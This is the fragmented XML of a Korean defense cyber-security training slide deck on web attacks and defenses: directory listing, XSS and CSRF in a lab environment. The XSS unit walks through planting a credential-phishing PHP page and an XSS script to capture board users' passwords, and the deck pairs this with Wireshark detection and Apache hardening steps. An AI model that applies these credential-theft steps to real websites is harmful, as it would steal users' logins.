              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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1) CSRF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의 취약점을 보완 설정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vi var/www/html/webhack/board/board_write_ok.php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󰏮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5DF112C-FD51-4EE6-B1A5-AE2C428E2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64" y="42712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서비스 재시작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service httpd restart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󰏮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962D58-0365-4429-9633-DD5B1B8B921C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="5363935"/>
            <a:ext cx="5616792" cy="113614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터미널 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA98924E-5DB4-443D-93E4-57430AEFF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91" y="5861957"/>
            <a:ext cx="5113020" cy="569421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15903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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>프로그램 실행</a:t>
            </a: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인터넷 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http://web.navy.mil.kr/webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하여 피해 서버에 접속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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 페이지에 게시글 목록에 경로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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>게시글 경로로 들어가 디렉토리 확인한다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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC95A4B-46B6-4B8A-9EFF-4E002941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330"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="711502"/>
            <a:ext cx="5400040" cy="2070608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="flat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9D96DF6-316D-4ACC-8CC0-E5991F11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98" y="3248079"/>
            <a:ext cx="5400040" cy="2774950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="flat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DF23FF63-98C8-4C2B-8AEF-C9B6A5CA1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254" y="711502"/>
            <a:ext cx="5204460" cy="2788031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17EF824F-0B85-4F2F-BF75-D4EBFF1264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017" r="2064"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359816" y="3842037"/>
            <a:ext cx="5288589" cy="2478746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222708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1884345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 5. keycode.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38843D9-C7B3-455A-9398-AE2F337B2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8" y="703338"/>
            <a:ext cx="5400040" cy="1380490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949C64-BB44-42EC-BA7B-AD755A4C9451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392120" y="2318657"/>
            <a:ext cx="5616792" cy="188434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터미널 실행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#acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/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83D1F73B-EECB-4CFD-8044-B12D859BF6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484" r="2788" b="12840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2866873"/>
            <a:ext cx="5249418" cy="959993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374306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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 직접 객체 참조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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귀하의 웹페이지에서 공격자는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Directory Listing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사용하여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웹서버의 구조와 파일 정보를 얻고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공격자로부터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Directory Listing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공격을 차단하여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보안을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강화하시오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wireshark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Directory Listing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차단 방법을 위한 설정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	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/httpd/conf/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httpd.conf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Directory Listing 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 공격을 탐지할 수 있다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Directory Listing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 공격을 대응할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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9231D57A-B0FE-4BCA-AC10-981F24E15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4" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="5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01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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 서버에서 아이콘 클릭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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 패킷을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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속한 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 들어오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속하는 정보를 가지고 있는 패킷을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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에 오른쪽 마우스 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭 하여 패킷의 상세한 내용을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- Follow TCP Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정보에 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 목록이 전송되는 것을 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>할수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 있다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4838464-D75F-4328-8BE0-A515C51D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8" y="915609"/>
            <a:ext cx="5400040" cy="1934083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D9B7B5A7-1EB3-4A88-B1AD-B7500CA1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98" y="3869479"/>
            <a:ext cx="5400040" cy="2440305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4EA99449-7710-4906-8AAB-011DAEEC6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462" y="661501"/>
            <a:ext cx="5400040" cy="3080512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3" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0BCACF-74F0-44BD-BA67-DEA27C50B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365" y="4088148"/>
            <a:ext cx="5400040" cy="2283333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141879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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]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1. Directory Listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 대한 공격을 차단 방법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/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일에서 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모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -&gt; Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변경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(/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/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 서버 설정 파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)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(Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉토리 지시자는 해당 디렉토리 이하의 모든 웹 문서를 웹 페이지에서 어떻게 제어 할 것인가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. )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# vi 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/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>httpd.conf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143530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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작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service httpd restart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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384E42CC-FD9B-4352-A253-E5405092D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8" y="2572959"/>
            <a:ext cx="5400040" cy="1892300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1" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3170A65-5E92-43BF-BC99-A93A603F9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98" y="4490180"/>
            <a:ext cx="5400040" cy="1949831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2" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4BF35A-4E71-4B95-80EB-D9003ABFE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464" y="874788"/>
            <a:ext cx="5400040" cy="688975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CDBFD6-F657-449E-B95E-8D13AAC277E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="1943396"/>
            <a:ext cx="5616792" cy="454560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터미널 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CC2A1A-931B-4388-B083-9C3D27237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974" y="2491316"/>
            <a:ext cx="5113020" cy="833755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164334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/Training/Unit/Web/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방어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공격자는 현재 피해 웹서버의 로그인 페이지소스를 얻고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게시글 페이지에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xss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취약성을 알아내었다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이때 피해서버에 게시글에 접근하는 사용자들의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id/password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얻을 수 있는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xss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실행하고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실행에 쓰인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정확한 파일의 경로와 이름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게시글의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입력하시오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toor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피해 웹 서버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http://web.navy.mil.kr/webhack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xss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공격에 필요한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들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/var/www/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게시글 생성 계정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test01 /test01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악성 스크립트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/var/www/xssattack.txt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XSS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 공격을 탐지하고 대응 할 수 있다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chemeClr val="bg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6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC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오른쪽 15">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF56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6948C8-67D4-42B2-B648-8637313C9B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D43794-A274-42D3-AF8E-BA3EBFA5B0B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B59B0-4A53-47EE-8E7E-0B19CF4CCF1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9A13631E-5D34-467E-A933-86B73C5E71B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901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E68EE656-116A-4575-9320-CD1FD43D1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776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공격자는 피해 웹페이지에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XSS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취약점 공격을 실행한다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1) /var/www/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밑에 파일들 확인 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cd /var/www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󰏮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ls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󰏮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_x926658296">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79DA57B4-D320-4843-91F0-1384300E8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4836"/>
            <a:ext cx="5400675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_x926656712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E0BA8B-8841-46FB-AA4E-C33B96FC8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33436"/>
            <a:ext cx="5400675" cy="68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926661176">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68EE07CF-E9AA-4128-97CE-DE2076A3A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45"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3779611"/>
            <a:ext cx="54006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B9329925-4819-4789-BB2A-81A4244FB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762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localhost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가 사용되는 웹 서버 기본 파일 위치를 파악하고 공격에 사용할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php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파일을 이동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cp ./getlogininfo.php ./html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󰏮 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 getlogininfo.php -&gt;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로그인 시 계정을 피싱하는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php&gt;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cp ./member_login.php ./html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󰏮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&lt;member_login.php -&gt;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로그인 폼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php&gt;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D75D0FB-E062-405F-B9CC-28A44AC12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224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사용할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xss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스크립트 내용 확인 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vi xssattack.txt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󰏮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C8538B2A-63F7-4B90-B7F9-13B886C0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730" y="4261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웹 브라우저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iceweasel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프로그램 실행 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_x106415376">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD4C741-3919-4062-B50E-52A540C1D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29"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="883309"/>
            <a:ext cx="5400675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FB524D4-2A7E-47A3-A591-CF35DD4CA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730" y="30454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인터넷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창에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http://web.navy.mil.kr/webhack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를 입력하여 피해 서버에 접속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3" name="_x925650632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3A0B5D-6771-4F6B-97EB-630009BB0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730" y="3502676"/>
            <a:ext cx="5400675" cy="277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04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1909</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>316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함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/2  2. 취약점 직접 객체 참조</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/2  2. 취약점 직접 객체 참조 - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/8  8. XSS 공격/방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/8  8. XSS 공격/방어 - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/9  9. 3.1. 크로스 사이트 요청변조</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/9  9. 3.1. 크로스 사이트 요청변조 - 대응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국방 사이버 보안</dc:title>
  <dc:creator>Author</dc:creator>
  <cp:lastModifiedBy>Author</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-09T23:50:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T00:18:51Z</dcterms:modified>
</cp:coreProperties>
</file>